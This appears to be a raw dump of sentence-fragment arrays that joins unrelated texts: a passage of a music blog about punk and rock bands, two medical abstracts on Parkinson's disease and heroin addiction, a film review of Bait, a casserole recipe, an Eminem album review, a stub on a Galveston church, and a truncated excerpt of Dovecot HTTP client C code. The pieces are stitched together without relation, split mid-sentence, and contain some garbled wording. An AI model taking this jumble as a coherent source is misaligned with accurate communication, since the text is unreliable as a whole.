emphasis on local or national punk bands.", "\n\nBut my first confrontation with Henry Rollins had begun back in the Skinny Years on a packed house night at DC Space (written in lower case in reality, I prefer to adhere to most standard English renderings because I usually can). ", "This was a spoken word event. ", "In fact I have never seen Rollins perform on stage, and frankly I do not think this small omission of fan authenticity makes me a bad person. ", "As I write this now, I somewhat regret not ever having seen Rollins in Black Flag. ", "No doubt he was a monster on the stage. ", "I don't specifically recall that I blew any opportunity to buy a ticket for Black Flag during those years, but I probably did.", "\n\nI had read, of course, much glitter about the Henry Rollins version of punishing high octane energy on stage in belting out the lyrics to such punk classics as My War and Rise Above. ", "I'd also read in various street zines and rags that he was also a nasty player in public in choosing to make a point of stepping into family restaurants and other lukewarm venues which always somehow included snarling at anyone who dare commit the unpardonable sin of staring and whispering among each other or in stunned silence at his buff tattooed uber self with a perfunctory, \"What the fuck are YOU looking at?\" ", "or something similar to nuclear flash and blind. ", "Not polite to stare? ", "How about not polite to bellow at strangers? ", "Giving as good as he got? ", "Hardly. ", "He wasn't the only punk rocker who delighted in this type of public rebellion, but I always found that type of behavior stupid and unjustified, and felt it MY duty to draw the ire of these types to myself, bonehead to bonehead, so to speak.", "\n\nSnappy beginnings? ", "Watch this snappy video from 1986. ", "Power pop with Concrete Blonde's edgy young Johnette Napolitanoas shefirstices the deck then skates right through not a few of us old coot dance punks still prowling about. ", "For those who remember those grinning days with a bit of sweat on our brow, let's just say, this group's Still in Hollywood is just a tease for what's to come in the early Nineties...\n\nAnybody not chewing the cud knew by then that girls could rock like Elvis and right from the start, they were as punk as they wanted to be. ", "But I'll be honest, I didn't discover Concrete Blonde until sometime in 2003 when I first launched Radio Scenewash and I think it was Andy Corrigan who gave me a stack of CD's which included the soundtrack of the David Lynch 1997 film—Lost Highway.", "\n\n\"I hate the word rock star. ", "All that shit in the 80s died there and it needs to stay there.", "\"—Adam Lazzara\n\nPulling back the gentle curtain on Taking Back Sunday, one is always quick to notice that Adam Lazzara is the force behind the rising from the noisy hardcore punk scene to the national rock stage through the steady band’s combination of pop-punk modern rock and straight-up pop. ", "Let's just say fifteen years of earning stripes, and evolving a sound rather than simpling tossing in the towel has begun to pay paid off.", "\n\nThe band was founded in 1999 by Eddie Reyes. ", "Reyes was already a veteran of the NYC music scene, and took part in numerous projects that kept him in the game. ", "After recording their initial eponymous EP, a Taking Back Sunday shake-up brought bassist Lazzara to lead vocals mic. ", "Seems to have been a smart move.", "\n\nIn the music recording industry, the line-up shuffles, the scandalous firings, the defections, the transitions, the unexplained exodus, the exodus for professional reasons, and the glorious and inglorious reunions are each a natural part of the often cut-throat business. ", "Almost goes without saying.", "\n\nTaking Back Sunday has not been immune to these group effect bodily functions. ", "During the 2006 Taste of Chaos tour (for which Taking Back Sunday was headlining) Fred Mascherino, who had joined Taking Back Sunday in 2003, returned home due to family commitments. ", "His fellow members of TBS were forced to continue without him, supported onstage by members of Saosin, Anti-Flag and Underoath. ", "He never came back, but when ready to return to work he started his own projects. ", "Others came and went.", "\n\nNow Lazzara, after ten years of fronting TBS, has gone solo and acoustic with a baneful tune—Because It Works.", "\n\nMy latest obsession is hearing and following the renaissance of 1970s-styled rock poets and musically innovative bands winning the hearts and minds of music ticket buyers everywhere. ", "Among the classiest of these bands is The Gaslight Anthem, and Brian Fallon is their poet laureate.", "\n\nIn 2008, The Gaslight Anthem released The '59 Sound LP, their second album which alerted music fans and critics alike that something new was pulling into town...\n\nThe Gaslight AnthemTheir first effort, Sink Or Swim, was a crackling hint of what was to come, but the album sound was rougher with jarring guitars, irregular beats more reminiscent to metal which roared over the poet's lines than a group hell bent on cranking out some new code, but critics nodded in agreement that this band had something special, something worth noticing.", "\n\nNew Jersey rock fans knew there was something there as the TGA fan base grew, something that would remain there, even as they sharpened and clarified their delivery system. ", "When the more polished breakthrough second album came along, huge segments of both the old school classic rock and post-punk rocker nation were easily hooked. ", "The Gaslight Anthem rose to stardom quickly. ", "With The '59 Sound many said a new Springsteen had been announced. ", "Eventually it became rumored that the Boss himself was an avid fan, as he was spotted in the audience of increasingly growing crowds. ", "Yes. ", "Most of the lads even hailed from the same backyard palace of New Jersey, New Brunswick, a mere half hour from beachside Asbury Park. ", "Soon they would share the same stage. ", "Also in 2008, the band covered \"God's Gonna Cut You Down\" for the Johnny Cash tribute album All Aboard! ", "A Tribute to Johnny Cash. ", "Brian Fallon has stated several times that without The Replacements there would be no Gaslight Anthem, as they are heavily influenced by them, especially their song \"Left of the Dial\".", "\n\nPaul Westerberg, of The Replacements once wrote a song, an acoustic ballad. ", "When he played it to the rest of the band, it was met with silence. \"", "Save that for your solo album, Paul,\" Bob Stinson said. \"", "That ain't the Replacements\". ", "The track remained unreleased for years. ", "Westerberg realized his toughest audience was the band itself, later saying, \"If it doesn't rock enough, Bob will scoff at it, and if it isn't catchy enough, Chris won't like it, and if it isn't modern enough, Tommy won't like it.\"", "\n\nThere's no doubt that Brian Fallon and his group is assembled with those same sentiments in mind.", "\n\nThe Beast in Its Tracks, Josh Ritter, Pytheas Recordings \"The Beast in Its Tracks\" is an achingly beautiful album about the process of moving on from one love to the next. ", "Oberlin College grad Josh Ritter handles the bitter (\"Hopeful\") and the sweet (\"…\n\nBob Dylan has been charged with incitement to hatred in France after he was quoted comparing Croats with Nazis in an interview with Rolling Stone magazine, a judicial source said Monday. ", "The world-famous American singer was questioned and charged last…\n\nOn September 3, alternative rock pioneers the Pixies released their first new music in over twenty years. ", "In this excerpt from a longer interview, band members address early criticism of their new music, as well as the sudden departure of bassist Kim…\n\nLust, power, desperation and betrayal are all part of Sanctified, a rock opera, Claire on a Dare’s latest indie project which is currently raising funds to produce an album that fuses music and the art of storytelling. “", "Claire on a Dare presents…" ]
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[ "Iron transport in Parkinson's disease.", "\nDopaminergic cell death in the substantia nigra (SN) is central to Parkinson's disease (PD) but the neurodegenerative mechanisms have not been completely elucidated. ", "Iron accumulation in dopaminergic neurons and glial cells in the SN of PD patients may contribute to the generation of oxidative stress, protein aggregation and neuronal death. ", "However, the mechanisms involved in iron accumulation remain unclear. ", "In previous studies we excluded a role of transferrin and its receptor in iron accumulation while we showed that lactoferrin receptors were overexpressed in blood vessels and dopaminergic neurons in Parkinson's disease. ", "We recently also described an increase in the expression of the divalent metal transporter 1 (DMT1/Nramp2/Slc11a2) in the SN of PD patients. ", "Using the PD animal model of 1-methyl-4-phenyl-1,2,3,6-tetrahydropyridine (MPTP) intoxication in mice, we showed that DMT1 expression increased in the ventral mesencephalon of intoxicated animals, concomitant with iron accumulation, oxidative stress and dopaminergic cell loss. ", "A mutation in DMT1 that impairs iron transport protected rodents against parkinsonism-inducing neurotoxins MPTP and 6-hydroxydopamine (6-OHDA). ", "This study supports a critical role for DMT1 in iron-mediated neurodegeneration in PD." ]
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[ "Cornish film-maker Mark Jenkin’s breakthrough feature is a thrillingly adventurous labour of love – a richly textured, rough-hewn gem in which form and content are perfectly combined. ", "A refreshingly authentic tale of tensions between locals and tourists in a once-thriving fishing village, it’s an evocative portrait of familiar culture clashes in an area where traditional trades and lifestyles are under threat. ", "Shot with clockwork cameras on grainy 16mm stock, which Jenkin hand-processed in his studio in Newlyn, Bait is both an impassioned paean to Cornwall’s proud past, and a bracingly tragicomic portrait of its troubled present and possible future. ", "It’s a genuine modern masterpiece, which establishes Jenkin as one of the most arresting and intriguing British film-makers of his generation.", "\n\nFishing-stock siblings Martin and Steven Ward (“Kernow King” Edward Rowe and Giles King respectively) are at odds. ", "While the former still scrapes a living selling his catch of fish and lobster door-to-door, his brother has succumbed to the tourist trade, using their late father’s boat to take rowdy, moneyed tourists on sightseeing trips. “", "He’d be spinning in his grave,” growls Martin, whose sense of betrayal has been worsened by the sale of the family home to incomers Tim and Sandra Leigh (Simon Shepherd and Mary Woodvine). ", "Now fishing nets have become chintzy decorations, the perfect accompaniment to a fridge stacked with prosecco.", "\n\nArguments about quayside parking and the noise of early morning sailings (“I’m pretty sure it’s against the law!”) ", "threaten to boil over into physical violence, but that doesn’t stop the Leighs’ daughter Katie (Georgia Ellery) from taking up with Steven’s ruggedly handsome son Neil (Isaac Woodvine), to the horror of her brother Hugo (Jowan Jacobs). “", "You didn’t have to sell us this house,” insists Sandra during a confrontation with Martin, whose curt response speaks volumes: “Didn’t we?”", "\n\nJenkin has crafted a 21st-century feature that carries within its DNA the evolution of the moving imag\n\nBuilding on the promise of the powerful 2015 short Bronco’s House, which tackled Cornwall’s housing crisis, Bait finds the film-maker once again addressing pressing social issues with a profoundly poetic sensibility. ", "As before, Jenkin shot Bait without sound, effectively creating a silent movie to which dialogue, music and sound effects were added later, splendidly concertinaing a century of cinema history. ", "The effect is bizarrely brilliant, lending a dreamlike quality to the dialogue, which transforms the spoken English into something weirdly reminiscent of a dubbed foreign-language film. ", "It’s a disorienting effect that highlights a central theme of Bait: people speaking in the same tongue yet failing to understand one another. ", "Crucially, Jenkin doesn’t caricature the incomers, suggesting that they too have been sold a lie – a picture-postcard image of Cornwall as removed from reality as the enchanted highlands of Brigadoon.", "\n\nRocking the boat: how Cornish class war inspired a masterpiece Read more\n\nWhile the post-synched speech has an alienating, Pinteresque theatricality, the rest of the soundtrack rises and falls like the tide, with Jenkin’s own synth drones weaving in and out of Daniel Thompson’s layered sound designs. ", "At times I was reminded of beatboxer Jason Singh’s mesmerising live vocal accompaniment, which I saw in 2016, to John Grierson’s 1929 fishing documentary Drifters, an overwhelming experience that similarly bridged the gap between old silent film and modern immersive sound.", "\n\nIt’s the visuals, however, that lift Bait into the realms of timelessness and transcendence. ", "Despite early success on video (his 2002 oddity Golden Burn won a first time director’s prize at the Celtic film and TV festival), the former promo-producer found himself artistically becalmed and turned to celluloid to reinvigorate his passion for cinema.", "\n\nAs his obsession with physical film stock flourished, so Jenkin’s vision became more focused, producing award-wining shorts like The Essential Cornishman and The Road to Zennor, which laid the experimental groundwork for Bait. ", "Relishing the strange alchemical accidents and human thumbprints of home-developed celluloid, Jenkin has crafted a 21st-century feature that carries within its DNA the evolution of the moving image, from Méliès to Andrew Kötting via Robert Bresson, Lynne Ramsay and (in a roundabout way) the magical visions of Powell and Pressburger.", "\n\nHaving premiered to rapturous applause at the Berlinale in February, Bait looks set to become one of the defining British films of the year, perhaps the decade. ", "Some have chosen to read it as a timely Brexit parable, although its roots and production predate the current crisis; clearly the fissures of the present run deep into the past. ", "Personally, I think its appeal is more universal, although (as always) it’s by focusing on the specifics – the knots of a lobster pot, the ripped entanglements of a fishing haul – that Jenkin manages to throw his net so far. ", "I hope he catches the widest possible audience.", "\n\nThis article contains affiliate links, which means we may earn a small commission if a reader clicks through and makes a purchase. ", "All our journalism is independent and is in no way influenced by any advertiser or commercial initiative. ", "By clicking on an affiliate link, you accept that third-party cookies will be set. ", "More information." ]
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[ "This post may contain affiliate links which won’t change your price but will share some commission.", "\n\nMy Chicken Bacon Ranch Casserole is a hit with kids and adults. ", "Quick, easy, and so comforting. ", "This is cheesy, bacony, and filling. ", "This Bacon Ranch Chicken Casserole is one of my favorite low carb chicken recipes ever. ", "Bacon chicken ranch casserole is low carb, keto, gluten-free, grain-free, sugar-free, and Trim Healthy Mama friendly.", "\n\nMondays can be tough. ", "Especially when the toddler wakes up every hour all night long the night before and won’t go back to sleep. ", "Again and again.", "\n\nI do enjoy cooking and baking or I wouldn’t have begun this blog but there are days I just need a break. ", "I knew by the time 5 o’clock came around I would be wiped and barely able to drag myself off the couch let alone make a nutritious dinner. ", "Thank God I already had cooked chicken in the fridge so I was able to quickly whip up a casserole that I could pop into the oven for dinner.", "\n\nMost of us gobbled it up and had seconds (the 4 yo has a limited acceptable food list and casseroles are not on it). ", "However, the first-grader claimed a thermos of the leftovers for lunch tomorrow. ", "That makes mommy happy.", "\n\nHow To Make Chicken Bacon Ranch Casserole\n\nYou’ll be thanking your lucky stars when you figure out how easy this chicken bacon ranch casserole really is! ", "It’s a huge time saver, and it’s made with healthy and delicious ingredients. ", "Let’s take a look at how to make this casserole dish.", "\n\nFirst Step: Start by preheating the oven to 350 degrees F.\n\nSecond Step: Mix together the cream cheese, sour cream, mayo, and spices in a large bowl. ", "Mix it thoroughly.", "\n\nThird Step: Add the chicken, broccoli, ¾ of the cheese, and ¼ of the crumbled bacon to the cream cheese mixture.", "\n\nFourth Step: Dump the casserole into a 9×13 baking dish that’s sprayed with cooking spray. ", "Add the rest of the cheese and bacon to the top.", "\n\nFifth Step: Bake the bacon chicken ranch casserole for 35 minutes, then serve hot! ", "Enjoy!", "\n\nWhere is the ranch?", "\n\nMy unique blend of spices is what gives this the ranch flavor. ", "You do not need a packet of ranch mix or bottled ranch dressing. ", "These spices and herbs also work well to make homemade ranch dressing or dip! ", "Just mix them with sour cream and mayo for a dip. ", "For dressing thin with a little almond milk.", "\n\nChicken Bacon Ranch Casserole Variations\n\nAs with many of my recipes, you can easily add your own spin of additional flavors and textures. ", "I love tossing in whatever sounds good that day! ", "Here are a few ideas to try:\n\nTurkey – If you have some cooked turkey from the holidays or just have some you want to use up, toss it in the casserole in place of the chicken. ", "It’s so good, and it’s a great way to use up leftovers too.", "\n\nGarlic – Mince some garlic and add it to the casserole. ", "I feel like you can never have too much garlic for anything! ", "Okay, maybe you can have too much, but adding some is always a plus.", "\n\nMozzarella Cheese – Either mix the cheddar cheese half and half with the mozzarella or go with mozzarella all the way. ", "It’s a lovely way to change the flavors!", "\n\nParmesan – Sprinkle some freshly grated parmesan on top the last 5 minutes of baking. ", "It will turn to a delightful golden brown color and tastes fantastic.", "\n\nGreen Onions – Add some finely chopped green onions to the top of the chicken bacon ranch casserole. ", "It’s so good!", "\n\nWhat Kind Of Chicken Do I Need To Use?", "\n\nYou can use whatever chicken you have on hand as long as it’s been cooked and cubed. ", "Rotisserie chicken, boneless skinless chicken breasts, and boneless skinless chicken thighs are my favorites. ", "They all go perfectly with the flavors and are easy to work with. ", "You can use bone-in chicken, but you are going to remove the meat from the bones before adding it to the casserole.", "\n\nWhat should I serve with this casserole?", "\n\nThis has all you need for a complete meal but if you want to serve an additional vegetable alongside it I’d recommend a Caesar salad, roasted asparagus, or roasted green beans.", "\n\nCan I Make Chicken Bacon Ranch Casserole Ahead Of Time?", "\n\nYes, this low carb chicken casserole is perfect for making ahead of time. ", "You can actually prepare the casserole and put it in the fridge for up to two days prior to baking. ", "This is amazing when you know you have some busy nights coming up.", "\n\nOne thing that is wonderful about this chicken bacon ranch casserole is that you can also make it to give to friends or family as a gift too. ", "If you know someone who just had a new baby or some people moved into your neighborhood, this is a great option!", "\n\nYou can also bake the casserole ahead of time and save it in the fridge or freezer until you are ready to serve as well. ", "If you love meal planning, this dish is an all-around winner!", "\n\nAfter the chicken casserole has cooked, it will last 3-4 days in the fridge. ", "Or if you opt to freeze it, it will last 2-3 months in the freezer. ", "Just make sure no matter how you store it, you keep it airtight and cold.", "\n\nHow Do You Reheat Chicken Casserole?", "\n\nYou can reheat the chicken casserole a couple of ways. ", "First of all, if you just want one or two helpings warmed up, you can heat it on a microwave-safe plate for a minute or two. ", "It heats up super fast, so it won’t take too long. ", "Make sure to stir it and not warm it up too much, or the texture will be strange.", "\n\nYou can also preheat your oven to 325 degrees F. and place the casserole in the oven for 12-15 minutes until it’s hot all the way through. ", "You may need to warm it a little longer if needed. ", "Just check it every little bit, so it doesn’t overheat and dry out.", "\n\nA few of my other favorite low carb chicken casserole recipes are:\n\nChicken Cordon Bleu Casserole\n\nMexican Chicken Casserole\n\nJalapeno Popper Chicken Casserole\n\nChicken Divan Casserole\n\nAnytime you need low carb chicken casserole recipes just come here. ", "We eat SO much chicken I am constantly trying to find new and exciting ways to use it.", "\n\nLike what you see? ", "Follow me on Facebook! ", "Love this recipe? ", "Leave a comment & 5-star rating right here! ", "Make sure you don’t miss new recipes by getting email updates!", "\n\nChicken Bacon Ranch Casserole This easy casserole has chicken, broccoli, bacon, and cheddar in a creamy homemade ranch sauce. ", "It is low carb, keto, gluten-free and kid approved! ", "Your whole family will love it. ", "Print Recipe Pin Recipe Prep Time: 10 minutes Cook Time: 30 minutes Total Time: 40 minutes Servings: 8 Calories: 498 Author: Taryn Ingredients 1.5 lb cooked chicken cubed 1.5 lb cooked chicken cubed\n\n1 lb fresh broccoli steamed and drained or frozen broccoli, thawed and drained 1 lb fresh broccoli steamed and drained or frozen broccoli, thawed and drained\n\n1 tbsp dried minced onion 1 tbsp dried minced onion\n\n1 tbsp dried parsley 1 tbsp dried parsley\n\n1/2 tbsp garlic powder 1/2 tbsp garlic powder\n\n1/2 tbsp dried dill weed or 1 tbsp fresh dill 1/2 tbsp dried dill weed or 1 tbsp fresh dill\n\n1/2 tsp salt 1/2 tsp salt\n\n1/2 tsp pepper 1/2 tsp pepper\n\n1/4 cup + 2 tbsp bacon crumbles 1/4 cup + 2 tbsp bacon crumbles\n\n8 oz. ", "cream cheese softened 8 oz. ", "cream cheese softened\n\n4 oz. ", "sour cream 4 oz. ", "sour cream\n\n4 oz. ", "mayo 4 oz. ", "mayo\n\n8 oz. ", "shredded cheddar 8 oz. ", "shredded cheddar Instructions Preheat oven to 350 if baking immediately. ", "Or you can prep ahead and keep in the refrigerator for a day or two.", "\n\nIn a big bowl combine cream cheese, sour cream, mayo, and spices and mix thoroughly.", "\n\n\n\nTo the cream cheese mixture, you just made add the chicken, broccoli, 3/4 of the cheese, and the 1/4 cup bacon crumbles and mix well.", "\n\nDump into a 9x13 baking dish sprayed with cooking spray. ", "Sprinkle remaining cheese and 2 tbsp bacon crumbles on top.", "\n\nBake until hot about 35 minutes. ", "Notes To Reheat: you can bake this again at 325 until hot or heat portions in the microwave. ", "To Freeze: I've frozen lunch-sized portions after baking and also prepped the casserole and frozen before baking - both options work! ", "Substitutions: you can swap turkey for the chicken and any cheese you like. ", "Don't eat pork? ", "Use turkey bacon. ", "Prep Time: if you are using pre-cooked chicken, bacon crumbles, and thawed frozen broccoli the prep time really is 10 minutes. ", "If you are using all fresh ingredients it is closer to 30 minutes. ", "Notes on Ranch: My unique blend of spices is what gives this the ranch flavor. ", "You do not need a packet of ranch mix or bottled ranch dressing. ", "Nutrition Calories: 498 | Carbohydrates: 5 g | Protein: 37 g | Fat: 36 g | Saturated Fat: 15 g | Cholesterol: 147 mg | Sodium: 601 mg | Potassium: 483 mg | Fiber: 1 g | Sugar: 2 g | Vitamin A: 1175 IU | Vitamin C: 51.3 mg | Calcium: 287 mg | Iron: 1.7 mg Tried this Recipe? ", "Tag me Today! ", "Mention @joyfilledeats or tag #joyfilledeats\n\nOriginally Published April 6, 2016. ", "Revised and Republished January 29, 2020." ]
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[ "Eminem Presents the Re-Up\n\n(Shady; US: 5 Dec 2006; UK: 4 Dec 2006)\n\nEminem: Eminem Presents the Re-Up\n\nBy Christopher Catania 1 January 2007\n\nLike he always has, Eminem unashamedly exerts on Eminem Presents the Re-Up‘s final track, “No Apologies”: “Expect no sympathy from me / I’m an Emcee / This is how I’m suppose to be / Cold as a G / My heart’s frozen / It don’t even beat / So expect no apologies”. ", "Though eloquently delivered, this seems like a cop out, admitting that The Re-Up as an Eminem disciple compilation doesn’t work. ", "The only thing that does are the beats—a brilliant mixture of Eminem’s dramatic touch and current mixtape complier the Alchemist.", "\n\nFrom the second you hear the intro’s gun clicking and the usual ominous Mather laugh over his trademark hyper-dramatized string section, topped off with more trite gun shots, you get the idea what you’re in for—if, that is, you’re not tipped-off by Eminem’s own cartoon posse drawing on the album’s cover.", "\n\nWhat makes The Re-Up hard to swallow? ", "Two-thirds of the lyrics. ", "The rest of the Eminem’s “family” doesn’t seem to catch on to what made him one of the best ever. ", "At this point, I’m not even sure how to take Eminem’s crew: a serious bunch of plotting gangsters who spit empty threats that don’t even resonate at all, or is the posse closer to becoming the boxed cartoon on the album’s cover? ", "I have to go with the cartoon option to be able to sit through an entire song any more. ", "Cartoons are easier to take seriously, because you don’t take them seriously at all.", "\n\nThere is, however, a bit of hope for the upstart protégées. ", "Stat Quo’s “Trying to Win” shows at least someone has the ability to go beyond the gangster pistol-whippin’ soap opera and give us something worth our time or to make us even remotely care.", "\n\nTossed in almost as an after thought is the thirty-second tribute to the late Proof, “Trapped”, which best explains how The Re-Up could have been great but is mostly a drag. ", "I wish there was something more. ", "New Shady clan member Bobby Creekwater doesn’t demand my attention any more than the rest, and I was disappointed to find no new rapper that floored me.", "\n\nIf the new members of the “Family”, as Eminem calls them in the intro, want to move into the mainstream and stay there like their leader, then they have to show some depth and content versatility, song after song, about something other than running out of a club shooting people, and how your bitch is a bitch, and that’s a bitch, and wanting to bust a cap in all the other bitches.", "\n\nThat being said, Eminem is Eminem because he showed us all the sides of himself—the profound and the profane—and was even vulnerable to the point of making himself the punch line, and even that was art. ", "That’s what his fans (this one included) connected with, and that’s what he has to teach his disciples if these guys are going to sell records.", "\n\nFor starters, you can toss out D12’s “Pistol Pistol” and keep the fire sale going with most of the 22 tracks. ", "The only saving aspect of this whole protégé promotion disaster is Eminem’s excellent ear for the dramatic sonic and the Alchemist’s deft blending of his style with Eminem’s. ", "He’s clearly come into his own as an executive producer, shouldering most of the creative burden without even saying a word—a clear sign that he’s matured, and the only real reason to pick this one up if you’re a die hard.", "\n\nThe only songs worthy of your own Eminem mixtape are “Public Enemy #1”, “No Apologies”, and “Jimmy Crack Corn”, the 50 Cent duo complete with breathy beatbox intro. ", "It’s no surprise that all of these tracks have Eminem on them. ", "It’s evidence that this is his clan and he’s still in control and fully capable of a complete take over, should he desire to trot on stage for a full show. ", "Why, then, doesn’t he stop telling us he can and just do it?", "\n\nEminem Presents the Re-Up started as an underground buzz project and should have remained there. ", "We already know Em’s skills. ", "I want to see what the others can do beyond spitting bullets at their enemies via the gangster cliché. ", "Hip-hop is not at its best on The Re-Up, but there are brief flashes of hope hidden amidst the gunk.", "\n\nAh, well, I’ll just pocket what I can, pretend like this didn’t really happen, and wait for the next Eminem record. ", "Maybe by then his crew will have caught on.", "\n\nIt was a year of thrilling comebacks from legends like My Bloody Valentine and David Bowie as well the launch of major new talents like Lorde and Kacey Musgraves. ", "These artists had the biggest impact on the shape of music in 2013." ]
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[ "Characteristics of psychopathology and the relationship between routes of drug administration and psychiatric symptoms in heroin addicts.", "\nThe objective of this study was to explore the characteristics of comorbid psychiatric symptoms and the relationship between different routes of drug administration and psychiatric symptoms. ", "Five hundred and nine heroin addicts were studied in Drug Detoxification and Rehabilitation Centers in Yunnan and Heilongjiang provinces of China. ", "The measure instrument, including demographic characteristics, history of drug abuse, and the Symptom Checklist-90 (SCL-90) scale (Chinese version), was administered to eligible heroin addicts. ", "Among the subjects, comorbid psychopathology conditions were more severe on all dimensions of SCL-90 comparing with normal adults and the average score of Depression was highest among the 9 dimensions in heroin addicts; psychiatric symptoms were more severe in heroin injecting group than in \"chasing the dragon\" group and only the difference in Obsessive-Compulsive was significant, but more significant differences were found between snorting heroin addicts and chasing or injecting heroin addicts, and the average score of each dimension of SCL-90 was higher in the snorting group than in the other 2 groups. ", "The reasons of the results and meaning for the present study are discussed. ", "In summary, comorbid psychiatric symptoms in the heroin addicts were very common and severe and their severity varied with different routes of drug administration, suggesting that routes of drug administration should be considered as an important risk factor to mental health of heroin addicts." ]
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[ "Reedy Chapel-AME Church\n\nReedy Chapel-AME Church is a historic church at 2013 Broadway in Galveston, Texas.", "\n\nThe church was built in 1886 and added to the National Register in 1984.", "\n\nSee also\n\nNational Register of Historic Places listings in Galveston County, Texas\nRecorded Texas Historic Landmarks in Galveston County\n\nReferences\n\nCategory:African Methodist Episcopal churches in Texas\nCategory:Churches on the National Register of Historic Places in Texas\nCategory:National Register of Historic Places in Galveston County, Texas\nCategory:Gothic Revival church buildings in Texas\nCategory:Churches completed in 1886\nCategory:19th-century Methodist church buildings in the United States\nCategory:Churches in Galveston, Texas\nCategory:Recorded Texas Historic Landmarks" ]
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[ "/* Copyright (c) 2013-2018 Dovecot authors, see the included COPYING file */\n\n#include \"lib.h\"\n#include \"net.h\"\n#include \"str.h\"\n#include \"hash.h\"\n#include \"llist.h\"\n#include \"array.h\"\n#include \"ioloop.h\"\n#include \"istream.h\"\n#include \"istream-timeout.h\"\n#include \"ostream.h\"\n#include \"time-util.h\"\n#include \"file-lock.h\"\n#include \"iostream-rawlog.h\"\n#include \"iostream-ssl.h\"\n#include \"http-response-parser.h\"\n\n#include \"http-client-private.h\"\n\n/*\n * Connection\n */\n\nstatic void http_client_connection_ready(struct http_client_connection *conn);\nstatic void http_client_connection_input(struct connection *_conn);\nstatic void\nhttp_client_connection_disconnect(struct http_client_connection *conn);\n\nstatic inline const struct http_client_settings *\nhttp_client_connection_get_settings(struct http_client_connection *conn)\n{\n\tif (conn->peer !", "= NULL)\n\t\treturn &conn->peer->client->set;\n\treturn &conn->ppool->peer->cctx->set;\n}\n\nstatic inline void\nhttp_client_connection_ref_request(struct http_client_connection *conn,\n\t\t\t\t struct http_client_request *req)\n{\n\ti_assert(req->conn == NULL);\n\treq->conn = conn;\n\thttp_client_request_ref(req);\n}\n\nstatic inline bool\nhttp_client_connection_unref_request(struct http_client_connection *conn,\n\t\t\t\t struct http_client_request **_req)\n{\n\tstruct http_client_request *req = *_req;\n\n\ti_assert(req->conn == conn);\n\treq->conn = NULL;\n\treturn http_client_request_unref(_req);\n}\n\nstatic void\nhttp_client_connection_unlist_pending(struct http_client_connection *conn)\n{\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tARRAY_TYPE(http_client_connection) *conn_arr;\n\tstruct http_client_connection *const *conn_idx;\n\n\t/* Remove from pending lists */\n\n\tconn_arr = &ppool->pending_conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (peer == NULL)\n\t\treturn;\n\n\tconn_arr = &peer->pending_conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n}\n\nstatic inline void\nhttp_client_connection_failure(struct http_client_connection *conn,\n\t\t\t const char *reason)\n{\n\tstruct http_client_peer *peer = conn->peer;\n\n\tconn->connect_failed = TRUE;\n\thttp_client_connection_unlist_pending(conn);\n\thttp_client_peer_connection_failure(peer, reason);\n}\n\nunsigned int\nhttp_client_connection_count_pending(struct http_client_connection *conn)\n{\n\tunsigned int pending_count = array_count(&conn->request_wait_list);\n\n\tif (conn->in_req_callback || conn->pending_request !", "= NULL)\n\t\tpending_count++;\n\treturn pending_count;\n}\n\nbool http_client_connection_is_idle(struct http_client_connection *conn)\n{\n\treturn conn->idle;\n}\n\nbool http_client_connection_is_active(struct http_client_connection *conn)\n{\n\tif (!", "conn->connected)\n\t\treturn FALSE;\n\n\tif (conn->in_req_callback || conn->pending_request !", "= NULL)\n\t\treturn TRUE;\n\n\treturn (array_is_created(&conn->request_wait_list) &&\n\t\tarray_count(&conn->request_wait_list) > 0);\n}\n\nstatic void\nhttp_client_connection_retry_requests(struct http_client_connection *conn,\n\t\t\t\t unsigned int status, const char *error)\n{\n\tstruct http_client_request *req, **req_idx;\n\n\tif (!", "array_is_created(&conn->request_wait_list))\n\t\treturn;\n\n\te_debug(conn->event, \"Retrying pending requests\");\n\n\tarray_foreach_modifiable(&conn->request_wait_list, req_idx) {\n\t\treq = *req_idx;\n\t\t/* Drop reference from connection */\n\t\tif (!", "http_client_connection_unref_request(conn, req_idx))\n\t\t\tcontinue;\n\t\t/* Retry the request, which may drop it */\n\t\tif (req->state < HTTP_REQUEST_STATE_FINISHED)\n\t\t\thttp_client_request_retry(req, status, error);\n\t}\t\n\tarray_clear(&conn->request_wait_list);\n}\n\nstatic void\nhttp_client_connection_server_close(struct http_client_connection **_conn)\n{\n\tstruct http_client_connection *conn = *_conn;\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client *client = peer->client;\n\tstruct http_client_request *req, **req_idx;\n\n\te_debug(conn->event, \"Server explicitly closed connection\");\n\n\tarray_foreach_modifiable(&conn->request_wait_list, req_idx) {\n\t\treq = *req_idx;\n\t\t/* Drop reference from connection */\n\t\tif (!", "http_client_connection_unref_request(conn, req_idx))\n\t\t\tcontinue;\n\t\t/* Resubmit the request, which may drop it */\n\t\tif (req->state < HTTP_REQUEST_STATE_FINISHED)\n\t\t\thttp_client_request_resubmit(req);\n\t}\n\tarray_clear(&conn->request_wait_list);\n\n\tif (client !", "= NULL && client->waiting)\n\t\tio_loop_stop(client->ioloop);\n\n\thttp_client_connection_close(_conn);\n}\n\nstatic void\nhttp_client_connection_abort_error(struct http_client_connection **_conn,\n\t\t\t\t unsigned int status, const char *error)\n{\n\tstruct http_client_connection *conn = *_conn;\n\tstruct http_client_request *req, **req_idx;\n\n\te_debug(conn->event, \"Aborting connection: %s\", error);\n\n\tarray_foreach_modifiable(&conn->request_wait_list, req_idx) {\n\t\treq = *req_idx;\n\t\ti_assert(req->submitted);\n\t\t/* Drop reference from connection */\n\t\tif (!", "http_client_connection_unref_request(conn, req_idx))\n\t\t\tcontinue;\n\t\t/* Drop request if not already aborted */\n\t\thttp_client_request_error(&req, status, error);\n\t}\n\tarray_clear(&conn->request_wait_list);\n\thttp_client_connection_close(_conn);\n}\n\nstatic void\nhttp_client_connection_abort_any_requests(struct http_client_connection *conn)\n{\n\tstruct http_client_request *req, **req_idx;\n\n\tif (array_is_created(&conn->request_wait_list)) {\n\t\tarray_foreach_modifiable(&conn->request_wait_list, req_idx) {\n\t\t\treq = *req_idx;\n\t\t\ti_assert(req->submitted);\n\t\t\t/* Drop reference from connection */\n\t\t\tif (!", "http_client_connection_unref_request(conn, 